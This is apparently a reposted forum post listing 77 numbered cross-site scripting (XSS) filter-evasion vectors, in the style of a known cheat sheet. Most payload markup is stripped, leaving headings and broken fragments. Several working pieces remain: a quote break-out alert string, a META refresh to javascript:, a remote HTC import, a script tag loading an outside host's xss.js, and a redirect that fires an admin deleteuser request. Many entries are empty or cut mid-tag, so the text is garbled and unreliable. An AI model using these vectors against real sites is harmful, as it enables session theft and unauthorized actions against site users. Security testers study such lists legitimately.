
XSS attack summary: what people working on website security need to watch for

admin | Script Attack and Defense | 2022-02-17 09:21:43 | XSS attack

(1) Plain XSS JavaScript injection
(2) IMG tag XSS using the JavaScript directive
(3) IMG tag with no semicolon and no quotes
(4) IMG tag, case-insensitive
(5) HTML encoding (semicolons required)
(6) Malformed IMG tag
”>
(7) fromCharCode tag (calculator)
(8) UTF-8 Unicode encoding (calculator)
(9) 7-digit UTF-8 Unicode encoding, which has no semicolons (calculator)
(10) Hexadecimal encoding, also without semicolons (calculator)
(11) Embedded tag, splitting the Javascript apart
(12) Embedded encoded tag, splitting the Javascript apart
(13) Embedded newline
(14) Embedded carriage return
(15) Embedded multi-line JavaScript injection; this is an extreme example of XSS
(16) Working around character limits (requires the same page)
(17) Null character
perl -e 'print "";' > out
12-7-1 T00LS - Powered by Discuz! Board https://www.t00ls.net/viewthread.php?action=printable&tid=15267
(18) Null character 2. Null characters are largely ineffective domestically, because there is nowhere they can be exploited.
perl -e 'print "alert(\"XSS\")";' > out
(19) IMG tag preceded by spaces and meta chars
(20) Non-alpha-non-digit XSS
(21) Non-alpha-non-digit XSS to 2
(22) Non-alpha-non-digit XSS to 3
(23) Double open bracket
<
(24) No closing script tag (Firefox and similar browsers only)
(25) No closing script tag 2
(26) Half-open HTML/JavaScript XSS
(27) Double open angle brackets
(28) No single quotes, double quotes, or semicolons
(29) JavaScript with escape filtering
\";alert('XSS');//
(30) Closing the TITLE tag
(31) Input Image
(32) BODY Image
(33) BODY tag
(34) IMG Dynsrc
(35) IMG Lowsrc
(36) BGSOUND
(37) STYLE sheet
(38) Remote style sheet
(39) List-style-image (list style)
XSS
(40) IMG VBscript
XSS
(41) META link url
URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
(43) Frame
(44) Table
(45) TD
(46) DIV background-image
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
(48) DIV expression
(49) STYLE attribute with a split expression
(50) Anonymous STYLE (composed of an open angle bracket followed by a letter)
(51) STYLE background-image
CLASS=XSS>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
(54) BASE
(55) EMBED tag: you can embed Flash that contains XSS
(56) ActionScript inside Flash can be used to mix in your XSS code
a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval_r(a+b+c+d);
(57) XML namespace. The HTC file must be on the same server as your XSS vector
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc"> XSS
(58) If your JS is filtered, you can exploit by adding JS code inside an image
(59) IMG embedded command, which can execute arbitrary commands
(60) IMG embedded command (a.jpg is on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
(62)
(63)
(64)
(65)
(66)
(67)
PT SRC="http://3w.org/xss.js">
(68) URL evasion
XSS
(69) URL encoding
XSS
(70) IP in decimal
XSS
(71) IP in hexadecimal
XSS
(72) IP in octal
XSS
(73) Mixed encoding
tt p://6 6.000146.0x7.147/"">XSS
(74) Omitting [http:]
XSS
(75) Omitting [www]
XSS
(76) Absolute dot, absolute DNS
XSS
(77) javascript link
XSS